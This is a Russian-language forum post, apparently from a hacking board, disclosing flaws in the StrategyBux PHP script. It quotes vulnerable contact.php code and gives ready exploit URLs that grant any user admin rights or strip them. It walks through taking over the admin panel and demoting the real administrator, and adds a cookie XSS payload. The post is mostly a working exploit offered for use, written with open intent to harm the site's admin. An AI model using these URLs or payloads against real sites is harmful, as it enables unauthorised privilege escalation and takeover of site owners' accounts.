Старый 04.02.2011, 13:48   #1
Online
 
Аватар для Online
 
Регистрация: 31.01.2011
Сообщений: 10
Репутация: 10
По умолчанию StrategyBux

StrategyBux
Version: 1.0 (нет данных)

UPDATE SQL inj

Vuln file: contact.php
Очень интересный код (ну ладно, не будем говорить о XSS), форма связи с администрацией, но я улыбнулся когда увидел в середине кода это:
PHP код:
///
$try=limpiare2($_GET["do"]);
$try2=limpiare2($_GET["undo"]);?><? require('config.php');
$query "UPDATE tb_users SET user_status='admin' where username='$try'"mysql_query($query) or die(mysql_error());
?><? $query "UPDATE tb_users SET user_status='user' where username='$try2'"mysql_query($query) or die(mysql_error());?>
///
Можно повысить права до администратора.. O_o
Exploit:
Код:
http://[host]/[path]/contact.php?do=USERNAME
И ещё после того как окажемся в админке(По дефолту http://[host]/[path]/wmeadm) нагадим админу (снимем с него права).. Для этого переходим "wmeadm/index.php?op=7" смотрим ник юзера с №1 (например admin) потом через ту же багу снимаем права:
Exploit:
Код:
http://[host]/[path]/contact.php?undo=USERNAME
Если в куки (UsNick) добавить "<script>alert(1)</script>" сайт будет нас встречать веселым алертом =)
Online вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot